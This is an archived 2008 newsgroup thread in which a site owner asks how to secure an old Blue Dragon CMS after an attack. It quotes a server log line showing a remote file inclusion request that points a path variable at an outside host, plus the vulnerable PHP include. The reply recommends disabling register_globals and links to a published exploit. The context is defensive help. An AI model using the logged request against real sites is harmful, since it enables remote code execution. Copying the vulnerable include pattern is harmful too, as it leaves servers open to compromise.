Reply to Re: Hacker's attack, please help...

Your name:

Reply:


Posted by Rik Wasmus on 02/02/08 12:00

On Sat, 02 Feb 2008 12:47:09 +0100, salonowiec =

<debrza_remove@poczta.onet.pl> wrote:

> My admin notified me that my site is closed till the eror is removed. =
My =

> CMS is PHPBlue Dragon (pretty old). The attack was like this (found in=
=

> logs):
>
> d198-53-20-215.abhsia.telus.net kurpiel.pl - =

> [01/Feb/2008:19:44:06 +0100] "GET =

> /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=3Dhttp:=
//pcbcservice.com/all.txt? =

> HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT =

> 5.1; .NET CLR 1.1.4322)"
>
>
>
> The above mentioned activecontent.php is:
>
> <?php
> /*********************************************************************=
******
> * Blue Dragon CMS Platinum
> * =

> ------------------------------------
> *
> * script file id : activecontent.php
> * begin platinum : 2004/03/01
> * copyright : (C) 2003 Apache
> *
> * file platinum ver : 1.0
> *
> * This source file is part of the "Blue Dragon CMS Platinum"(Conten=
t =

> Management System).
> *
> * This file may be distributed and/or modified under the terms of t=
he
> * "Blue Dragon CMS Platinum License" version 2 as published by the =
=

> software author.
> *
> * This file is provided AS IS with NO WARRANTY!
> *********************************************************************=
*****/
>
> include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$=
phpExt);?>Can =

> I - rather ignorant in php - modify the file to make it =

> hackerresistant? Many thanks

Register globals should be off....
And I started to type a whole story, then, for some reason, I decided to=
=

Google this 'Blue Dragon CMS'. Here you go, one of the first hits:
<http://securitydot.net/xpl/exploits/vulnerabilities/articles/909/exploi=
t.html>

Personally, any CMS with this kind of vulnerability, AND relying on =

register_globals, has instantly lost all my trust.
-- =

Rik Wasmus

[Back to original message]


Удаленная работа для программистов  •  Как заработать на Google AdSense  •  England, UK  •  статьи на английском  •  PHP MySQL CMS Apache Oscommerce  •  Online Business Knowledge Base  •  DVD MP3 AVI MP4 players codecs conversion help
Home  •  Search  •  Site Map  •  Set as Homepage  •  Add to Favourites

Copyright © 2005-2006 Powered by Custom PHP Programming

Сайт изготовлен в Студии Валентина Петручека
изготовление и поддержка веб-сайтов, разработка программного обеспечения, поисковая оптимизация